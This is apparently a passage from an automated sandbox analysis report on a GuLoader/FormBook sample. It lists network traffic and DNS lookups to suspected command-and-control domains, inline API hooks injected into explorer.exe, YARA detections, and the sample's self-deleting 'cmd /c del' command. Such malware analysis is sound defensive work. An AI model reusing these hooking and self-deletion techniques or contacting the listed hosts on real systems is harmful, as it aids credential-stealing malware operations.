                                                                      Mar 20, 2023 09:09:13.502350092 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502365112 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502382040 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502439022 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502439022 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502439976 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502440929 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502440929 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502454996 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502470016 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502500057 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502512932 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502612114 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502614021 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502613068 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502614021 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502613068 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502614975 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502613068 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502615929 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502613068 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502613068 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502613068 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502613068 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502613068 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502633095 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502640009 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502640009 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502640009 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502648115 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502660990 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502677917 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502695084 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502707958 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502723932 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502742052 CET8049810195.133.40.46192.168.11.20
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 20, 2023 09:08:23.342824936 CET6107853192.168.11.209.9.9.9
                                                                      Mar 20, 2023 09:08:23.391607046 CET53610789.9.9.9192.168.11.20
                                                                      Mar 20, 2023 09:09:54.924993038 CET5515253192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:09:55.175930977 CET53551521.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:10:13.575550079 CET5184753192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:10:13.629487038 CET53518471.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:10:33.993092060 CET6339853192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:10:34.015582085 CET53633981.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:10:54.194255114 CET5192653192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:10:54.252357006 CET53519261.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:11:14.422035933 CET6547253192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:11:14.789616108 CET53654721.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:11:14.790040970 CET6547253192.168.11.209.9.9.9
                                                                      Mar 20, 2023 09:11:15.178378105 CET53654729.9.9.9192.168.11.20
                                                                      Mar 20, 2023 09:11:35.339004993 CET6182353192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:11:35.402036905 CET53618231.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:11:55.584259987 CET5448653192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:11:55.599153996 CET53544861.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:12:15.752722979 CET5174953192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:12:15.800843000 CET53517491.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:12:36.216002941 CET5545353192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:12:36.538785934 CET53554531.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:12:57.117762089 CET6086153192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:12:57.154711008 CET53608611.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:13:17.816112995 CET5117653192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:13:17.829958916 CET53511761.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:13:38.327482939 CET6498953192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:13:38.744119883 CET53649891.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:13:38.744478941 CET6498953192.168.11.209.9.9.9
                                                                      Mar 20, 2023 09:13:39.748574018 CET6498953192.168.11.209.9.9.9
                                                                      Mar 20, 2023 09:13:41.763811111 CET6498953192.168.11.209.9.9.9
                                                                      Mar 20, 2023 09:13:42.112545967 CET53649899.9.9.9192.168.11.20
                                                                      Mar 20, 2023 09:13:42.521053076 CET53649899.9.9.9192.168.11.20
                                                                      Mar 20, 2023 09:13:44.021675110 CET53649899.9.9.9192.168.11.20
                                                                      Mar 20, 2023 09:13:58.229331970 CET5745953192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:13:59.215681076 CET53574591.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:14:39.517093897 CET5539853192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:14:39.532558918 CET53553981.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:14:59.906671047 CET6174453192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:15:00.032583952 CET53617441.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:15:32.548209906 CET5828153192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:15:32.885806084 CET53582811.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:15:35.157414913 CET5693453192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:15:35.175795078 CET53569341.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:15:55.495990992 CET6014853192.168.11.201.1.1.1
                                                                      Mar 20, 2023 09:15:55.980588913 CET53601481.1.1.1192.168.11.20
                                                                      Mar 20, 2023 09:16:37.346389055 CET5341753192.168.11.201.1.1.1
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Mar 20, 2023 09:08:23.342824936 CET192.168.11.209.9.9.90x5d5eStandard query (0)97.97.242.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                      Mar 20, 2023 09:09:54.924993038 CET192.168.11.201.1.1.10x11acStandard query (0)www.paparazirestaurant.co.ukA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:10:13.575550079 CET192.168.11.201.1.1.10x8943Standard query (0)www.eliteequinewellness.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:10:33.993092060 CET192.168.11.201.1.1.10x421cStandard query (0)www.economjchq.spaceA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:10:54.194255114 CET192.168.11.201.1.1.10xa29eStandard query (0)www.friendsofquarepianos.co.ukA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:14.422035933 CET192.168.11.201.1.1.10xb1a8Standard query (0)www.goverifyvin.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:14.790040970 CET192.168.11.209.9.9.90xb1a8Standard query (0)www.goverifyvin.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:35.339004993 CET192.168.11.201.1.1.10x4097Standard query (0)www.arialttnr.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:55.584259987 CET192.168.11.201.1.1.10x7a1Standard query (0)www.eeccu.infoA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:15.752722979 CET192.168.11.201.1.1.10xe5d7Standard query (0)www.garageautosaintthomas.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:36.216002941 CET192.168.11.201.1.1.10xa35dStandard query (0)www.hospitalityhsia.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:57.117762089 CET192.168.11.201.1.1.10xc5ddStandard query (0)www.abimpianti.chA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:17.816112995 CET192.168.11.201.1.1.10x7d8Standard query (0)www.drugtestingservices.co.ukA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:38.327482939 CET192.168.11.201.1.1.10xa63cStandard query (0)www.thinkdev.africaA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:38.744478941 CET192.168.11.209.9.9.90xa63cStandard query (0)www.thinkdev.africaA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:39.748574018 CET192.168.11.209.9.9.90xa63cStandard query (0)www.thinkdev.africaA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:41.763811111 CET192.168.11.209.9.9.90xa63cStandard query (0)www.thinkdev.africaA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:58.229331970 CET192.168.11.201.1.1.10x8fe7Standard query (0)www.top-promotion.netA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:14:39.517093897 CET192.168.11.201.1.1.10x68aaStandard query (0)www.amyjohnsonrealtor.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:14:59.906671047 CET192.168.11.201.1.1.10x3f09Standard query (0)www.lists-cellphones.lifeA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:32.548209906 CET192.168.11.201.1.1.10xed83Standard query (0)www.findyellowfreightjobs.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:35.157414913 CET192.168.11.201.1.1.10xc133Standard query (0)www.conscienciaretroprogresiva.comA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:55.495990992 CET192.168.11.201.1.1.10xcbb2Standard query (0)www.triknblog.netA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:16:37.346389055 CET192.168.11.201.1.1.10x67ebStandard query (0)www.laposadaapts.comA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Mar 20, 2023 09:08:23.391607046 CET9.9.9.9192.168.11.200x5d5eName error (3)97.97.242.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                      Mar 20, 2023 09:09:55.175930977 CET1.1.1.1192.168.11.200x11acNo error (0)www.paparazirestaurant.co.uk192.187.111.221A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:10:13.629487038 CET1.1.1.1192.168.11.200x8943No error (0)www.eliteequinewellness.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 20, 2023 09:10:13.629487038 CET1.1.1.1192.168.11.200x8943No error (0)ghs.googlehosted.com142.250.185.211A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:10:34.015582085 CET1.1.1.1192.168.11.200x421cNo error (0)www.economjchq.space188.114.97.3A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:10:34.015582085 CET1.1.1.1192.168.11.200x421cNo error (0)www.economjchq.space188.114.96.3A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:10:54.252357006 CET1.1.1.1192.168.11.200xa29eNo error (0)www.friendsofquarepianos.co.uk81.17.29.147A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:14.789616108 CET1.1.1.1192.168.11.200xb1a8Server failure (2)www.goverifyvin.comnonenoneA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:15.178378105 CET9.9.9.9192.168.11.200xb1a8Server failure (2)www.goverifyvin.comnonenoneA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:35.402036905 CET1.1.1.1192.168.11.200x4097No error (0)www.arialttnr.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:35.402036905 CET1.1.1.1192.168.11.200x4097No error (0)ghs.googlehosted.com142.250.186.51A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:11:55.599153996 CET1.1.1.1192.168.11.200x7a1Name error (3)www.eeccu.infononenoneA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:15.800843000 CET1.1.1.1192.168.11.200xe5d7No error (0)www.garageautosaintthomas.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:15.800843000 CET1.1.1.1192.168.11.200xe5d7No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:15.800843000 CET1.1.1.1192.168.11.200xe5d7No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:15.800843000 CET1.1.1.1192.168.11.200xe5d7No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:15.800843000 CET1.1.1.1192.168.11.200xe5d7No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:36.538785934 CET1.1.1.1192.168.11.200xa35dNo error (0)www.hospitalityhsia.com206.233.207.174A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:12:57.154711008 CET1.1.1.1192.168.11.200xc5ddNo error (0)www.abimpianti.ch217.26.48.101A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:17.829958916 CET1.1.1.1192.168.11.200x7d8No error (0)www.drugtestingservices.co.uk165.160.15.20A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:17.829958916 CET1.1.1.1192.168.11.200x7d8No error (0)www.drugtestingservices.co.uk165.160.13.20A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:38.744119883 CET1.1.1.1192.168.11.200xa63cServer failure (2)www.thinkdev.africanonenoneA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:42.112545967 CET9.9.9.9192.168.11.200xa63cServer failure (2)www.thinkdev.africanonenoneA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:42.521053076 CET9.9.9.9192.168.11.200xa63cServer failure (2)www.thinkdev.africanonenoneA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:44.021675110 CET9.9.9.9192.168.11.200xa63cServer failure (2)www.thinkdev.africanonenoneA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:13:59.215681076 CET1.1.1.1192.168.11.200x8fe7Name error (3)www.top-promotion.netnonenoneA (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:14:39.532558918 CET1.1.1.1192.168.11.200x68aaNo error (0)www.amyjohnsonrealtor.comamyjohnsonrealtor.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 20, 2023 09:14:39.532558918 CET1.1.1.1192.168.11.200x68aaNo error (0)amyjohnsonrealtor.com13.248.157.32A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:00.032583952 CET1.1.1.1192.168.11.200x3f09No error (0)www.lists-cellphones.life104.21.39.114A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:00.032583952 CET1.1.1.1192.168.11.200x3f09No error (0)www.lists-cellphones.life172.67.144.224A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:32.885806084 CET1.1.1.1192.168.11.200xed83No error (0)www.findyellowfreightjobs.com169.60.232.139A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:32.885806084 CET1.1.1.1192.168.11.200xed83No error (0)www.findyellowfreightjobs.com169.60.232.138A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:35.175795078 CET1.1.1.1192.168.11.200xc133No error (0)www.conscienciaretroprogresiva.comconscienciaretroprogresiva.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:35.175795078 CET1.1.1.1192.168.11.200xc133No error (0)conscienciaretroprogresiva.com34.102.136.180A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:15:55.980588913 CET1.1.1.1192.168.11.200xcbb2No error (0)www.triknblog.net183.181.96.18A (IP address)IN (0x0001)false
                                                                      Mar 20, 2023 09:16:37.623399973 CET1.1.1.1192.168.11.200x67ebNo error (0)www.laposadaapts.comwww-laposadaapts-com.rentcafecn.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 20, 2023 09:16:37.623399973 CET1.1.1.1192.168.11.200x67ebNo error (0)www-laposadaapts-com.rentcafecn.comwww.rentcafecloudflarecn.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 20, 2023 09:16:37.623399973 CET1.1.1.1192.168.11.200x67ebNo error (0)www.rentcafecloudflarecn.comwww.rentcafecloudflarecn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                      • 195.133.40.46
                                                                      • www.paparazirestaurant.co.uk
                                                                      • www.eliteequinewellness.com
                                                                      • www.economjchq.space
                                                                      • www.friendsofquarepianos.co.uk
                                                                      • www.arialttnr.com
                                                                      • www.garageautosaintthomas.com
                                                                      • www.hospitalityhsia.com
                                                                      • www.abimpianti.ch
                                                                      • www.drugtestingservices.co.uk
                                                                      • www.amyjohnsonrealtor.com
                                                                      • www.lists-cellphones.life
                                                                      • www.findyellowfreightjobs.com
                                                                      • www.conscienciaretroprogresiva.com
                                                                      • www.triknblog.net

                                                                      Code Manipulations

                                                                      Function NameHook TypeActive in Processes
                                                                      PeekMessageAINLINEexplorer.exe
                                                                      PeekMessageWINLINEexplorer.exe
                                                                      GetMessageWINLINEexplorer.exe
                                                                      GetMessageAINLINEexplorer.exe
                                                                      Function NameHook TypeNew Data
                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE9
                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE9
                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE9
                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE9

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:09:08:25
                                                                      Start date:20/03/2023
                                                                      Path:C:\Users\user\Desktop\SC.028UCCP.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\SC.028UCCP.exe
                                                                      Imagebase:0x400000
                                                                      File size:267392 bytes
                                                                      MD5 hash:3F8F4A7F43B5627ED45128BB99F0B471
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2936860727.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2936860727.000000000411D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Target ID:6
                                                                      Start time:09:09:00
                                                                      Start date:20/03/2023
                                                                      Path:C:\Users\user\Desktop\SC.028UCCP.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\SC.028UCCP.exe
                                                                      Imagebase:0x400000
                                                                      File size:267392 bytes
                                                                      MD5 hash:3F8F4A7F43B5627ED45128BB99F0B471
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2969977740.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:low

                                                                      Target ID:7
                                                                      Start time:09:09:14
                                                                      Start date:20/03/2023
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff6a8130000
                                                                      File size:4849904 bytes
                                                                      MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.7461101436.000000000AD28000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:moderate

                                                                      Target ID:8
                                                                      Start time:09:09:19
                                                                      Start date:20/03/2023
                                                                      Path:C:\Windows\SysWOW64\mstsc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                      Imagebase:0x870000
                                                                      File size:1264640 bytes
                                                                      MD5 hash:B038F39C887BE2A810E20B08613F3B84
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:moderate

                                                                      Target ID:9
                                                                      Start time:09:09:23
                                                                      Start date:20/03/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del "C:\Users\user\Desktop\SC.028UCCP.exe"
                                                                      Imagebase:0x4f0000
                                                                      File size:236544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:10
                                                                      Start time:09:09:24
                                                                      Start date:20/03/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7259f0000
                                                                      File size:875008 bytes
                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language

                                                                      No disassembly